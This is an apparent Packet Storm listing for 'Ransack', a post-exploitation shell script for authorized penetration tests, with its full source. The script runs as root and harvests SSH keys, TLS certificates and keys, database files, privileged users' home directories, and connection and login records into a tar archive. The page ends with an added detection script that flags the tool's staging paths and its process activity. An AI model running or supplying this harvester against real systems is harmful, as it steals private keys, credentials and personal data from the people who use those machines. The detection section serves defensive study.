Ransack Post Exploitation Tool

Posted May 3, 2012
Authored by Jesus Oquendo

Ransack is a post exploitation shellscript for penetration testers. Its purpose is to grab any information deemed relevant on a system, post root compromise. This information may include config files, ssh keys, ssl keys, or any other information deemed valuable.

tags | tool, root, forensics
MD5 | 0962e2345c1f5dbab439c0b85f04748f


# Ransack Post Exploitation Tool v 0.1

# Ransack's sole purpose is to grab any information deemed
# relevant following a root compromise during an authorized
# penetration test. This information may include config
# files, ssh keys, ssl keys, or any other information
# deemed valuable.

# The goal is to minimize the amount of time spent digging
# through a machine in search of specifics. Instead,
# ransack will look for any data that stores configuration
# information (which may at times contain usernames and
# passwords), connection based information (including who
# is connected to what, what processes are listening and
# so forth), usernames and groups.

# It is written specifically as a shell script to avoid
# relying on another programming language that may not at
# times be available on another system. Rather than having
# to install python, perl, ruby, etc., it relies on tools
# that are always on most modern and legacy Unix variants.
# It will also work out who counts as a high value target
# (someone in a specific group such as wheel or root) and
# copy over their information as well.

# This tool is for post exploitation penetration testing
# it is not meant to be used for nefarious purposes and
# was never meant to be. It is simply a tool to make
# gathering information simpler while performing
# AUTHORIZED penetration tests.

# If you have to ask: "How does it work?!?", "How can I
# get r00t?!?", or some other question along these lines
# there is a 99.99999% chance that there is an ID 10 T
# error on the machine you're using. You will need to
# fix that issue before proceeding.

# Sloppy - sure, but effective, reliable and quick
# Tested on various versions of FreeBSD, OpenBSD, Debian,
# CentOS, Ubuntu, etc.

# On FreeBSD/AMD Athlon(tm) 64 X2 Dual Core Processor
# 4400+ with 2TB, I was able to get all that I needed in
# under 6 minutes. YMMV

# On Linux
# $ awk '/model name|MHz/' /proc/cpuinfo
# model name : AMD Phenom(tm) 9850 Quad-Core Processor
# cpu MHz : 2511.730
#
# 1 TB took 8 minutes

# Better than spending too much time figuring out what's
# what and where on a system. 0.1 is due to me coming
# out with a Solaris and OSX iteration in a bit.

#
# ''=~('(?{'.('._).^~'^'^-@@*^').'"'.(']),^'^'.@@|').',$/})')
#

if [ "$(id -u)" != "0" ]; then
clear ; printf "apropos RTFM\n" 1>&2
exit 1
fi

if [ -d "/tmp/0xdeadbeef" ]
then
rm -rf /tmp/0xdeadbeef
fi

dir=/tmp/0xdeadbeef/

echo "Making directories"

mkdir $dir
cd $dir
mkdir sshkeys certificates databases configurations

# Not using xargs piped from find, to avoid errors with
# trailing lines

find / -name .ssh > $dir/sshkeys/sshkeys
find / | awk '/\.crt|\.pem|\.key|\.cert/' > $dir/certificates/certs
find / |awk '/\.db|\.sql|\.sqlite/ && !/\/ports\/|msf/' > $dir/databases/db

echo "Getting user information..."
last | awk '{print $1,$3}'|sort -u > $dir/user.data.ransack

clear ; echo "Finding what's opened connection wise"
lsof | grep -i listen | awk '{print $1"\t"$3"\t"$9}'|\
sort -u > $dir/listening.data.ransack

clear ; echo "Finding out who owns processes and what groups can modify those processes"
which `lsof | grep -i listen | awk '{print $1"\t"$3"\t"$9}'|\
sort -u` |xargs ls -lth > $dir/owners.data.ransack

clear ; echo "Finding interesting groups"
awk -F ":" '$3 <= 1000 {print}' /etc/group |\
grep -vi "#" > $dir/groups.data.ransack

clear ; echo "Finding high value targets and ransacking them"
awk -F ":" '{print $1}' $dir/groups.data.ransack | while read group
do ls -ltha /home/|grep $group |\
awk '{print "cp -Rf /home/"$9" /tmp/0xdeadbeef/"}'|\
grep -v "e/\." | sh
done


clear ; echo "Finding established sessions (network recon)"
netstat -a | awk '/LIST|EST|CLO/' | sort -u > $dir/connexion.data.ransack

clear ; if [ -e /var/log/secure ]
then
awk '/ccept/{print $9,$11}' /var/log/secure|sort -u > $dir/connexion.data.ransack
else
if [ -e /var/log/auth.log ]
then
awk '/ccept/{print $9,$11}' /var/log/auth.log | sort -u > $dir/connexion.data.ransack
fi
fi

for i in `cat $dir/sshkeys/sshkeys`
do
cp -Rf "$i" $dir/sshkeys/
done


for j in `cat $dir/certificates/certs`
do
cp -Rf "$j" $dir/certificates/
done

for k in `cat $dir/databases/db`
do
cp -Rf "$k" $dir/databases/
done

tar -cf /tmp/ransack.tar $dir/*
clear
echo "Ransacking done" ; ls -ltha /tmp/ransack.tar

rm -rf $dir
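From the defensive side, the script above is also a handy list of indicators: it stages everything under /tmp/0xdeadbeef, names each output file *.data.ransack, and writes the final archive to /tmp/ransack.tar. The following POSIX sh check is an added example written for this page; it is not part of Ransack or of Packet Storm's listing. It assumes an optional path prefix (so it can be pointed at a mounted disk image rather than the live root) and a `ps -eo user,args` style process listing; the sample listing embedded below is constructed.

```shell
#!/bin/sh
# Added detection example (not part of Ransack): look for the artifacts
# the script above leaves behind and for its collection phase in a
# process listing. Indicators come straight from the script:
#   /tmp/0xdeadbeef   staging directory
#   /tmp/ransack.tar  final archive
#   *.data.ransack    per-category output files
# The prefix argument is an assumption of this example so the check can
# be run against a mounted image or a constructed test tree.

ransack_artifacts() {
    root="${1:-}"
    hits=0
    for p in "$root/tmp/0xdeadbeef" "$root/tmp/ransack.tar"; do
        if [ -e "$p" ]; then
            printf 'indicator: %s\n' "${p#"$root"}"
            hits=$((hits + 1))
        fi
    done
    # Output files survive if the run was interrupted before its rm -rf,
    # or if the archive was unpacked somewhere under /tmp. Paths are
    # word-split here, which is fine for the fixed names involved.
    for f in $(find "$root/tmp" -name '*.data.ransack' 2>/dev/null); do
        printf 'indicator: %s\n' "${f#"$root"}"
        hits=$((hits + 1))
    done
    return "$hits"   # 0 = clean; otherwise the number of indicators seen
}

# Reads "ps -eo user,args" style lines on stdin and prints those that
# match Ransack's collection phase: root running a filesystem-wide find,
# or any root process referencing the staging directory or archive.
ransack_process_hints() {
    awk '$1 == "root" && (($2 == "find" && $3 == "/") || /0xdeadbeef|ransack\.tar/)'
}

# Constructed sample process listing for a stand-alone run.
SAMPLE_PS='USER     COMMAND
root     find / -name .ssh
www      find / -name .ssh
root     /usr/sbin/sshd -D
root     tar -cf /tmp/ransack.tar /tmp/0xdeadbeef/sshkeys
alice    find / -name todo.txt'

printf '%s\n' "$SAMPLE_PS" | ransack_process_hints
```

On a live host run `ransack_artifacts /` (or `ransack_artifacts /mnt/image` on a mounted image) and feed `ps -eo user,args` into `ransack_process_hints`. The process check is deliberately narrow: a root-owned `find /` is noisy on its own, so the filter pairs it with the script's fixed paths, and the `*.data.ransack` search catches runs that were interrupted before the cleanup at the end of the script.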

© 2016 Packet Storm. All rights reserved.